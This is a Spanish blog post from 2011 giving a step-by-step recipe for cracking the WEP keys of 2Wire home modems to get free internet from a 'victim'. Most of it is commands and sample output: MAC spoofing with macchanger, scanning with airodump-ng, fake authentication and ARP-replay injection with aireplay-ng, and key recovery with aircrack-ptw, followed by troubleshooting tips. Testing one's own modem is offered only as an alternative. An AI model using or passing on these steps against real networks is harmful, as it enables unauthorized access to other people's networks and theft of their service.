miércoles, 21 de diciembre de 2011

Hackeo Redes Inalambricas

Una vez mas a razon de que han surgido varias dudas sobre la infiltracion wep sobre los modems 2wire, los mas usados por telmeZ de México, aqui vamos de nuevo con otra explicacion mas de como infiltrarse de manera rapida.
Todos estamos en la expectativa de las fallas informaticas y es de ahi donde sale una muy facil de penetrar, esto nos garantiza internet en todos lugares Burla, claro que siempre y cuando haya alguien con su conexion infiernitum.
 Ingredientes de la receta:
  • Una victima, o en su defecto para propositos de aprendizaje, tu propio modem 2Wire
  • Que su laptop, portatil o como le llame tenga una tarjeta inalambrica INTEL 3945 ABG
  • La distro Wifi Way, Back track o wifi slax, las cuales puedes encontrar en este portal, http://mirrorlinux.net/live 
  • Capacidad de lectura
  • Paciencia 
Prefacio:
En esta guia se indicaran los pasos para la infiltracion, el uso que le de es responsabilidad completa del lector, este metodo es experimental y necesita paciencia, ademas de una buena lectura y capacidad para seguir instrucciones.
Para las tarjetas que NO son intel 3945 se suprimiran los pasos 1 y 2 de la siguente guia, a partir del punto donde se menciona el macchanger, el procedimiento es el mismo.
Si usted a reunido todos los ingredientes comenzemos con la receta:
Paso 1:
Una vez iniciado el sistema en live CD, se parcha inmediatamente la plaquita, puesto que los drivers no vienen por default, con la siguiente instruccion.
 osoluche:/# ipw3945_es.sh

Paso 2:
Revisamos como nos ha identificado nuestra tarjeta wireles con el comando
 osoluche:/# iwconfig
Siendo que, para algunos aparecera como eth1, en otros casos como wifi0, en otros rtap0, asi que hay que poner mucha atencion en el nombre, el identificador sera porque tiene mensajes de la misma conexion, es decir, la configuracion de la tarjeta.
Paso 3:
Cambiamos nuestra ip, para continuar nuestra infiltracion "silenciosa"
 osoluche:/# macchanger -m 00:11:22:33:44:55 wifi0   *** Para esta guia usaremos wifi0 como el nombre de la tarjeta, ojo con este detalle ***
Paso 4:
Lanzamos nuestro scanner haber quien atackamos
 osoluche:/# airodump-ng wifi0   
Cuando nos salga una lista de numeritos, detenemos la aplicacion con las teclas CTRL + C, posteriormente hay que anotar sobre la victima 3 cosas escenciales
  1. ESSID
  2. BSSID
  3. CHANNEL 
  4. Direccion MAC de la victima
 Los anotamos en una hojita o donde quieran, estos datos los usaremos durante todo el desarrollo de la operación, obiamente tomaremos los numeros de donde recibamos mas paquetes de respuesta, entre mas haya es mejor para la infiltracion.

Paso 5:
Ahora bien, teniendo los anteriores datos procedemos con la autentificacion en la red contraria.
 osoluche:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0
Hasta que salgan los siguientes mensajes podremos seguir con el siguiente paso, si no sale, intente con otra direccion.

1:18:20 Sending Authentication Request
1:18:20 Authentication successful
1:18:20 Sending Association Request
1:18:20 Association successful :-)

Paso 6:
 Una vez hecha la infiltracion procede la captura y creacion del archivo donde mantendremos nuestra recepcion de paquetes.
 osoluche:/# airodump-ng -c (el canal donde esta la victima)  -w captura wifi0   
Ahora si, ahora estamos listos, infiltrados y recibiendo trafico 
Paso 7:
Solicitamos paquetes ARP, a la victima para que en nuestro archivo de captura se vayan registrando los datos del trafico
 osoluche:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Saving ARP requests in captura.cap
You should also start airodump-ng to capture replies.
Read 40999 packets (got 21930 ARP requests), sent 40902 packets...

Paso 8:
tenemos que esperar un ratito para que siga subiendo la cantidad de paquetes recolectados, teniendo los suficientes ejecutaremos la herramienta para que lea todos estos, lo cual nos devolvera la clave wep para conectarnos normalmente.
osoluche:/# aircrack-ptw captura01.cap
 lo ultimo que nos dira sera:
Key found at  XX:XX:XX:XX !
Si no sale eso, todavia faltan mas paquetes, asi que no tenemos otra opcion mas que esperar.

Problemas comunes:
SI la maquina se te llega a congelar.... es porque la tarjeta se dividio en 2 interfaces, normalmente son rtap0  / wifi0, entonces la solucion para esto es que el airodump lo hagas con rtap0 y el aireplay con wifi0.
El envio de paquetes no autentifica...... Esto sucede porque tu tarjeta no soporta la inyeccion de paquetes, esto podria presentarse en las inalambricas intel 2100, intel 2200, no queda otra opcion mas que llorar, o bien comprar una inalambrica con chipset Atheros, que es la mas recomendada para el proceso.
No sale la clave... esperar otro ratito a que haya mas paquetes ARP, es por eso que se pide paciencia en esta recetika.

No hay comentarios:

Publicar un comentario